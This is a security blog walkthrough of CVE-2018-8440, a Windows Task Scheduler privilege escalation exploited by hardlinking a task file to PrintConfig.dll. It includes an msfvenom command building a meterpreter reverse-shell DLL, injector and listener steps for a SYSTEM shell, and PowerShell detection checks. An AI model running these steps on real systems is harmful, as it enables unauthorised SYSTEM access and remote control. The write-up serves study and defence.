Latest Exploit: Privilege Escalation via Windows Task Scheduler


A local privilege escalation vulnerability (CVE-2018-8440, CVSS score 7.8) exists in the Windows Task Scheduler service, through which a local unprivileged user can change the permissions of a file they could not otherwise touch and end up with SYSTEM privileges. The idea is to point the Task Scheduler, via a hardlink, at a system file so that it rewrites that file's ACL for us; once the ACL grants us write access we replace the file and let a privileged process load it. The file used here is PrintConfig.dll, a DLL that the print spooler (spoolsv.exe, which runs as SYSTEM) loads: it is made user-modifiable through the hardlink, overwritten with an attacker-controlled DLL, and then loaded by spoolsv.exe.

Understanding the Scenario

In a correct design, a process running with User A's privileges that services a request from User B (the logged-on user) must impersonate User B while it performs the requested action. The process temporarily takes on User B's security context, performs the action so that the access check is made against User B's token rather than its own, and reverts to its original privileges once the action is complete.


In our scenario, however, the Task Scheduler is a process running with SYSTEM privileges and it fails to follow that rule. When User B (the logged-on user) calls the SchRpcSetSecurity method, the service should impersonate User B before it touches the target file; instead it performs the operation with its own SYSTEM token, so the access check is made against SYSTEM rather than against the caller. This is the condition we will leverage and exploit.

Advanced Local Procedure Call (ALPC)

ALPC is a high-speed, message-based inter-process communication mechanism implemented in the NT kernel. It can be used for communication between:

  • Two user-mode processes.
  • A user-mode process and a kernel-mode driver.
  • Two kernel-mode drivers.

LPC is used only within the local system; it is not a network transport. Remote Procedure Call (RPC) is what is used between two different systems, but the same RPC runtime also runs locally with ALPC as its transport (the ncalrpc protocol sequence), and that is exactly how the Task Scheduler's RPC interface, and therefore SchRpcSetSecurity, is reached from a local client. ALPC arrived in Windows Vista and replaced the older LPC. It works in a client/server model and, unlike LPC, supports asynchronous messaging, so a client does not have to block while the server handles its message. The Local Security Authority Subsystem Service (LSASS), the Session Manager (SMSS) and the Service Control Manager all use (A)LPC ports directly to communicate with client processes; Winlogon and the Security Reference Monitor use it to communicate with the LSASS process.

The Task Scheduler exposes SchRpcSetSecurity, a method of its RPC interface that any local process can call over ALPC to set a security descriptor on a task file or folder. The method fails to impersonate the requesting client when it writes the security descriptor, so the write is performed with the service's SYSTEM token. Because the task files live under C:\Windows\Tasks, where any user can create files, a hardlink placed there makes the Task Scheduler change the Access Control List (ACL) of whatever file the link points to, including files the caller has no right to modify.

We will demonstrate the following through the POC (https://github.com/bharadwajyas/TasScheduler_ALPC-Exploit):

  1. Any user can create files under C:\Windows\Tasks, so the POC creates UpdateTask.job there as a hardlink to PrintConfig.dll, a DLL that the spoolsv.exe process trusts and loads (the first thing the POC does is find the location of PrintConfig.dll on the target; see the figure).
  2. It then changes the permissions of UpdateTask.job by calling the Task Scheduler's SchRpcSetSecurity method. A hardlink is just another name for the same file, and the security descriptor belongs to the file rather than to the name, so modifying the permissions of UpdateTask.job modifies the permissions of PrintConfig.dll, which becomes user-modifiable.
  3. It replaces the DLL with a malicious DLL (in our case one that gives us a reverse shell on the attacker machine).
  4. The modified DLL is loaded by spoolsv.exe as SYSTEM and performs the attacker-defined actions. The POC triggers this load itself (by submitting a print job) rather than waiting for someone to print, which is why the effect is immediate.
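Step 2 above relies on a property of NTFS that is easy to verify without any privilege: a hardlink is a second name for the same file record, and the security descriptor is stored with the record, so a DACL written through one name is visible through the other. The following PowerShell is an added example, not part of the original post or of the POC; it reproduces the three file-level steps in a scratch directory under $env:TEMP with files you own (the file names mirror the POC but are stand-ins, and the grantee and directory names are assumptions).

```powershell
# Added example, not part of the original post or the POC: why setting a DACL on
# the hardlink UpdateTask.job also changes PrintConfig.dll. Runs as a normal user
# in a scratch directory; the names below are stand-ins for the real files.

$work   = Join-Path $env:TEMP ('hardlink-acl-' + [guid]::NewGuid().ToString('N'))
$target = Join-Path $work 'PrintConfig.dll'   # stand-in for the protected DLL
$link   = Join-Path $work 'UpdateTask.job'    # stand-in for the .job hardlink
New-Item -ItemType Directory -Path $work | Out-Null
Set-Content -LiteralPath $target -Value 'original contents'

# Step 1: create the hardlink. The POC does this for a file under
# System32\DriverStore; here New-Item is enough because we own the target.
New-Item -ItemType HardLink -Path $link -Target $target | Out-Null

# A principal that normally has no entry on files under your profile, so the
# change is easy to spot. The POC grants the calling user instead (assumption).
$grantee = 'Everyone'
$before  = (Get-Acl -LiteralPath $target).Access |
           Where-Object { $_.IdentityReference.Value -eq $grantee }

# Step 2: add a DACL entry through the LINK name only. This is what
# SchRpcSetSecurity does on UpdateTask.job, except that the service does it as
# SYSTEM on a target the caller could not open for WRITE_DAC itself.
$acl  = Get-Acl -LiteralPath $link
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule($grantee, 'FullControl', 'Allow')
$acl.AddAccessRule($rule)
Set-Acl -LiteralPath $link -AclObject $acl

# Read the DACL back through the ORIGINAL name: the new entry is there too.
$after = (Get-Acl -LiteralPath $target).Access |
         Where-Object { $_.IdentityReference.Value -eq $grantee }

# Step 3: writing through either name replaces the single shared data stream,
# which is why spoolsv.exe later loads the attacker's DLL under the real name.
Set-Content -LiteralPath $link -Value 'replacement contents'
$seen = (Get-Content -LiteralPath $target -Raw).Trim()

[pscustomobject]@{
    LinkType              = (Get-Item -LiteralPath $target).LinkType
    GranteeOnTargetBefore = [bool]$before
    GranteeOnTargetAfter  = [bool]$after
    ContentViaTarget      = $seen
}

Remove-Item -LiteralPath $work -Recurse -Force
```

Run it in any Windows PowerShell 5.1 or later session: GranteeOnTargetBefore comes back False, GranteeOnTargetAfter True, and ContentViaTarget reads "replacement contents". The only thing the vulnerability adds to this picture is who sets the ACL: a normal user cannot open PrintConfig.dll with WRITE_DAC, but the Task Scheduler, acting as SYSTEM on the caller's behalf instead of impersonating the caller, can.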

 

Lab Setup

Operating System | OS Version | Hotfix Applied | User Logged on | IPv4
Kali Linux | Kali 2017.2 | - | root | 192.168.245.145
Windows 10 (x64) | Microsoft Windows 10 Enterprise 2016 LTSB (10.0.14393 N/A Build 14393) | KB3176936, KB4033631, KB4049411, KB4054590, KB4485447, KB4493478, KB3193494 | adminuser (under-privileged user) | 192.168.245.134

Demonstration

Open Process Explorer with administrator privileges and look at the spoolsv.exe process: it runs as SYSTEM.

The ‘adminuser’ account, whatever its name suggests, is a plain member of the Users group; we can verify that as follows:

net user adminuser

Now open a command prompt with normal (non-elevated) privileges and launch notepad.exe from it.

We can see the spawned process in Process Explorer.

The notepad.exe process has Process ID 5068 (note it, the exploit takes it as an argument) and runs under cmd.exe as adminuser. We now head straight to the exploit and run the following command from a PowerShell window opened with normal privileges.

After firing the exploit, notepad is running under the spoolsv.exe process with SYSTEM privileges. That is the POC's default payload: the DLL it writes over PrintConfig.dll does nothing more than start notepad from inside spoolsv.exe.

Next we swap that payload for our own malicious DLL. The DLL that Injectdll.exe injects into our notepad process is ALPC-TaskSched-LPE.dll, and it carries the payload DLL that gets written over PrintConfig.dll as an embedded resource. At the moment that embedded payload is exploit.dll from the ‘Resources’ folder, which by default spawns notepad under the spoolsv.exe process.

Using msfvenom we generate a malicious DLL that connects back to our attacking machine (the Kali box). The DLL will be loaded by spoolsv.exe, a 64-bit process on this target, so the payload has to be x64:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.245.134 lport=444 -f dll > lol.dll

lhost must be the address the Kali handler listens on. The lab table above lists Kali as 192.168.245.145 and the Windows target as 192.168.245.134, so check the value against your own setup before generating the payload.

CFF Explorer is a Portable Executable (PE) editor (part of the Explorer Suite) with a built-in resource editor. We use it to embed our malicious DLL in the final DLL (ALPC-TaskSched-LPE.dll) in place of exploit.dll, as follows:

The CFF Explorer view looks like the figure below. Go to Resource Editor > RCDATA, select the existing resource and replace it with the malicious DLL (lol.dll).

The contents of exploit.dll are shown below. RCDATA is the raw-data resource type: raw-data resources let an application carry arbitrary binary data directly inside the executable file, which is how the POC ships its payload DLL inside ALPC-TaskSched-LPE.dll.

Select the malicious DLL in the file dialog.

Overwrite the original file and save it. We overwrite the original DLL because the POC loads the DLL by its fixed name, ALPC-TaskSched-LPE.dll.

Alternatively, we could save the DLL under our own file name and change the DLL name in the exploit's source accordingly.

Our malicious DLL is now embedded in \x64\ALPC-TaskSched-LPE.dll.

Now open a new PowerShell window with normal privileges, and on the attacker box (Kali) start a listener on TCP port 444 that matches the payload (a Metasploit multi/handler set to windows/x64/meterpreter/reverse_tcp). Then execute the following command, passing it the Process ID of the notepad process:

Injectdll.exe 5068 \x64\ALPC-TaskSched-LPE.dll

Process Explorer shows the newly spawned processes that connect back to the attacker machine (we got this after 5-10 retries).

And on the attacker machine we get a SYSTEM shell.

From the Meterpreter session we can spawn a shell and check our privileges. We can also verify the connection from the victim machine with:

netstat -an
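Seen from the defender's side, the technique leaves two artifacts on disk that are cheap to check: a hardlink under C:\Windows\Tasks whose other name is outside that folder, and a PrintConfig.dll whose DACL now grants write access to an unprivileged principal (and, after step 3, whose contents are no longer Microsoft-signed). The script below is an added example, not part of the original post or of the POC; it runs elevated on a suspect host, uses the paths the post describes, and the trusted-principal list and the PrintConfig.dll filter are assumptions you may need to widen.

```powershell
# Added example, not part of the original post or the POC: responder checks for
# the artifacts this technique leaves behind. Run from an elevated PowerShell.

$tasksDir  = 'C:\Windows\Tasks'
$driverDir = 'C:\Windows\System32\DriverStore\FileRepository'
# Principals that legitimately hold write rights on system DLLs (assumption).
$trusted   = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

# 1. Hardlinks planted in C:\Windows\Tasks. fsutil prints every name that shares
#    the file record as a volume-relative path; a .job file whose other name
#    lives outside the Tasks folder is the exploit's first step.
function Find-ForeignHardlinks {
    Get-ChildItem -LiteralPath $tasksDir -File -Force | ForEach-Object {
        $names = & fsutil.exe hardlink list $_.FullName 2>$null
        $other = @($names | Where-Object { $_ -and ($_ -notlike '\Windows\Tasks\*') })
        if ($other.Count -gt 0) {
            [pscustomobject]@{ File = $_.FullName; AlsoNamed = ($other -join '; ') }
        }
    }
}

# 2. State of every PrintConfig.dll in the DriverStore. Write access for any
#    principal outside the trusted set means the SchRpcSetSecurity step ran; a
#    signature status other than Valid means the file itself was replaced (the
#    genuine DLL is Microsoft-signed, an msfvenom DLL is NotSigned).
function Test-PrintConfigDll {
    Get-ChildItem -LiteralPath $driverDir -Recurse -Filter 'PrintConfig.dll' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $acl = Get-Acl -LiteralPath $_.FullName
        $bad = @($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (([int]$_.FileSystemRights -band [int]$writeMask) -ne 0) -and
            ($trusted -notcontains $_.IdentityReference.Value)
        })
        [pscustomobject]@{
            Path         = $_.FullName
            Owner        = $acl.Owner
            ExtraWriters = ($bad | ForEach-Object { $_.IdentityReference.Value }) -join ', '
            Signature    = (Get-AuthenticodeSignature -LiteralPath $_.FullName).Status
            SHA256       = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
        }
    }
}

Find-ForeignHardlinks | Format-Table -AutoSize
Test-PrintConfigDll   | Format-List
```

On a clean host the first function prints nothing and the second shows an empty ExtraWriters column with Signature Valid for every copy; a populated ExtraWriters, a NotSigned status, or a hash that differs between copies of the same driver package is worth an investigation. The checks are point-in-time: once the attacker's DLL has been loaded by spoolsv.exe, restoring the ACL does not undo the code that already ran as SYSTEM.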

The exploit discussed above works on most of the then-current Windows products, including Windows 10 (32-bit and 64-bit) and Windows Server 2016, as long as the September 2018 security update in which Microsoft fixed CVE-2018-8440 is not installed. This blog is for educational purposes only and the author is not responsible for any misconduct by the viewers. Stay tuned for our next blog post. Till then, HacknPentest!!

 

Author: Yash Bharadwaj

Maintained by: Puneet Choudary

References:

https://nvd.nist.gov/vuln/detail/CVE-2018-8440#vulnCurrentDescriptionTitle

https://github.com/bharadwajyas/TasScheduler_ALPC-Exploit

https://blogs.msdn.microsoft.com/ntdebugging/2007/07/26/lpc-local-procedure-calls-part-1-architecture/

https://en.wikipedia.org/wiki/Local_Inter-Process_Communication

https://blog.0patch.com/2018/08/how-we-micropatched-publicly-dropped.html

 


4 Responses

  1. Harsh Shrivastava says:

    Great work.
    Easy to understand

  2. Amit Dwivedi says:

    Well explained and well illustrated by the number of tries you guys did. Really great work
